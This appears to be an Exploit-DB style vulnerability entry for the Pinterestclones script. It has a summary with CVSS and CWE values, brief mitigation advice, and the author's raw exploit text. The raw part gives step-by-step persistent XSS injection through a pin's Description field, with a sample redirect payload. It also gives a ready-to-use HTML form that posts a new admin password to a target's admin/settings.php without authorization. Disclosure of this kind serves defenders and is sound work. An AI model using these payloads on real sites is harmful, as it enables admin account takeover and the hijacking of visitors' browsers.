Pinterestclones Multiple Vulnerabilities

vendor:

Pinterestclones

by:

DaOne

7.5

CVSS

HIGH

Persistent XSS, Remote Change Admin Password

79, 16

CWE

Product Name: Pinterestclones

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Pinterestclones Multiple Vulnerabilities

The Persistent XSS vulnerability allows an attacker to inject malicious code into the Description field, which will be executed when anyone visits the site. The Remote Change Admin Password vulnerability allows an attacker to change the admin password by submitting a form with the desired new password.

Mitigation:

To mitigate the Persistent XSS vulnerability, the application should properly validate and sanitize user input before displaying it. To mitigate the Remote Change Admin Password vulnerability, the application should enforce strong password policies and implement proper access controls.

Source

Exploit-DB raw data:

##########################################
[~] Exploit Title: Pinterestclones Multiple Vulnerabilities
[~] Author: DaOne
[~] Price: $199.99
[~] Software Link: http://www.pinterestclones.com/
[~] Google Dork: N/A
##########################################

[#] [Persistent XSS]

How to exploit:

1-go to : http://site.com/createusernamen/
2-Put anything in the other field [Password & E-mail] etc...
3-Go to: Add > Upload a Pin and Put in [Description] field the XSS code >Example:<META http-equiv="refresh" content="0;URL=http://www.google.com">
4-Now anyone go to: http://site.com/ will redirected to google.com or exploit your XSS Code.



[#] [Remote Change Admin Password]

<form action="http://[TARGET]/admin/settings.php" method="post" class="niceform" name="frmname" enctype="multipart/form-data">
Name:<input type="text" class="txtFname" name="name" id="name" size="50" value="Admin"/>
User Name:<input type="text" class="txtFname" name="uname" readonly="readonly" id="uname" size="50" value="admin@pinterestclones.com"/>
New Password:<input type="password" class="txtFname" name="password" id="password" size="50" value=""/>
Confirm Password:<input type="password" class="txtFname" name="cpassword" id="cpassword" size="50" value=""/>
Site Slogan:<input type="text" name="txtSlogan" id="txtSlogan" size="50" value="Your online pinboard"/>
Site URL:<input type="text" name="txtUrl" id="txtUrl" size="50" value=""/>
Admin Email:<input type="text" name="aemail" id="aemail" size="50" value=""/>
�Under maintenance:<select name="maintenance">
<option value="No" selected>No</option>
<option value="Yes">Yes</option>
</select>
Maintenance message:
<input type="text" name="maintenancemsg" id="maintenancemsg" size="50" value="We are upgrading the site."/>
<dl class="submit">
<input type="submit" value="Save" class="submit" name="sbmtbtn" style="width:50px;"/>
</form>


##########################################
[*] Contact me
�www.facebook.com/TGT.LY
##########################################